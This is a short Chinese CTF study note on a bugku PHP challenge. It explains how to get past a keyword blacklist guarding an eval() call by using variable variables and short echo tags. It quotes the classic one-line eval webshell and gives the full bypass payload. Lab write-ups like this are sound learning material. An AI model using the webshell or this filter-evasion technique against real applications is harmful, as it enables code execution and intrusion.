CTF--bugku--学习笔记

题目

<?php
    error_reporting(0);
    require __DIR__.'/flag.php';
 
    $exam = 'return\''.sha1(time()).'\';';
 
    if (!isset($_GET['flag'])) {
        echo '<a href="./?flag='.$exam.'">Click here</a>';
    }
    else if (strlen($_GET['flag']) != strlen($exam)) {
        echo '长度不允许';
    }
    else if (preg_match('/`|"|\.|\\\\|\(|\)|\[|\]|_|flag|echo|print|require|include|die|exit/is', $_GET['flag'])) {
        echo '关键字不允许';
    }
    else if (eval($_GET['flag']) === sha1($flag)) {
        echo $flag;
    }
    else {
        echo '马老师发生甚么事了';
    }
 
    echo '<hr>';
 
    highlight_file(__FILE__);

1.eval函数漏洞

        这个函数会导致任意代码执行,也就是常见的一句话木马<?php eval($_POST[cmd])?>

2.echo flag 绕过

        因为echo被禁了,所以该怎么构造flag的值呢?

       sha1可以利用短标签来绕过,<?php ?>是长标签,<? ?>是短标签

        并且<?= ?>和<?php echo ?>是一样的意思

3.结果

        绕过语句

?flag=$a='fla1';$a{3}='g';?><?=$$a;?>111111111111111111

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值